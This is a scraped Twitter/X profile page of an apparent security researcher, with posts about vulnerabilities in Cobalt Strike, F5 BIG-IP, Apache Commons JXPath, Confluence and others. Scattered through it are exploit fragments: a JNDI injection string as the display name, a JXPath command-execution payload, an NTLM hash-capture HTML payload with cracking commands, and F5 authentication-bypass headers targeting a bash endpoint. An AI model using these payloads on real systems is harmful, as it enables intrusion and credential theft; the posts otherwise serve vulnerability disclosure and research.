Olivia
Online
Jas502n
@jas502n
${jndi:dns://${hostName}.github.com/jas502n}
Become Who You Are
Central Region, Singapore
Joined July 2016
1.1K Following
8.2K Followers
720 Posts
Pinned Tweet
#CVE-2022-39197 Cobalt Strike RCE =< 4.7
use codeql to search exploit chain from the database compiled by openjdk and cobaltstrike4.5 db
org.apache.batik.swing.JSVGCanvas#setURI
org.apache.batik.bridge.BaseScriptingEnvironment#loadScript
New blog post: Cobalt Strike and YARA - Can I have your signature? https://t.co/hn9dGv7Kho
Converting PPLFault (original: https://t.co/SjSmi2MYJa) has been one of the more difficult BOF converts, but was still pretty fun to tackle :)
Cobatstrike4.8更新了,优化了一些基本后渗透的功能,也没什么能大改的了,除非换个logo
https://t.co/vhznH8eiId
Who to follow
Cyber Advising
@cyber_advising
Cyber Security Consulting | Ethical Hacking & Exploit Research |
Exploit Finder https://t.co/eLzA8NUQGo
/r/netsec
@_r_netsec
Follow for new posts submitted to the netsec subreddit. Unofficial.
Nuclei by ProjectDiscovery 
@pdnuclei
Nuclei uses a vast templating library to scan applications, cloud infrastructure, and networks to find and remediate vulnerabilities.
https://t.co/Aiakg6zuuO
@joel_land docker-compose.yml set env MINIO_UPDATE_MINISIGN_PUBKEY:
https://t.co/7aZxON2IeR
example:
environment:
MINIO_UPDATE_MINISIGN_PUBKEY:
#CVE-2023-28432 minio Information Disclosure in Cluster Deployment
Our technical deep-dive blog post for the recent #VMware vRealize Log Insight RCE vulnerability chain leading to root privileges.
💥CVE-2022-31704, CVE-2022-31706, CVE-2022-31711
💥POC exploit in post
https://t.co/g7CxjMvHop
Let's explore how we turned a path traversal affecting binwalk into arbitrary code execution - https://t.co/wtwW9CwFBy
New blog post on a recent collab with @UsmanMansha420 where I bypassed Akamai WAF to get RCE on a Java application with Spring EL injection. Spent some time writing about the process of constructing the custom payload. Hope you enjoy! https://t.co/hsuRmM3fx6
#CVE-2022-41828 amazon-redshift-jdbc-driver <=2.1.0.7 RCE
#CVE-2022-41852 Apache Commons JXPath RCE
context.getValue("start(https://t.co/FfJNJjYYst('calc'))")
<dependency>
<groupId>commons-beanutils</groupId>
<artifactId>commons-beanutils</artifactId>
</dependency>
#CVE-2022-39197 Cobalt Strike
<html>< img src='file://x.x.x.x/netntlm2'%>
python3 https://t.co/L4ftnwVwvh -I eth0
john --format=netntlmv2 --wordlist=pass.txt creds.txt
#CVE-2022-39197 Cobalt Strike <=4.7 RCE
https://t.co/XXZgZFFHx1
⚠️ Don't buy anything from Zer0Day Lab channels, its a warning before you get scam!
https://t.co/2XQgbpzPVi
#CVE-2022-26134 Atlassian Confluence RCE
boolean authenticate(String username, String password)
#CVE-2022-1388 F5's BIG-IP Unauth RCE
Connection: keep-alive, X-F5-Auth-Token
Authorization: Basic YWRtaW46
X-F5-Auth-Token: anything
https://x.x.x.x:443/mgmt/tm/util/bash
🔥 We have reproduced the fresh CVE-2022-1388 in F5's BIG-IP.
Successful exploitation could lead to RCE from an unauthenticated user.
Patch ASAP!
Trends for you
Most Popular Users
Elon Musk
@elonmusk
240.2M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
109.1M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.3M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.6M followers
KATY PERRY
@katyperry
86.9M followers
Taylor Swift
@taylorswift13
80.7M followers
Lady Gaga
@ladygaga
72.3M followers
Kim Kardashian
@kimkardashian
69.4M followers
Virat Kohli
@imvkohli
68.7M followers
YouTube
@youtube
68.6M followers
Bill Gates
@billgates
63.5M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.2M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
60M followers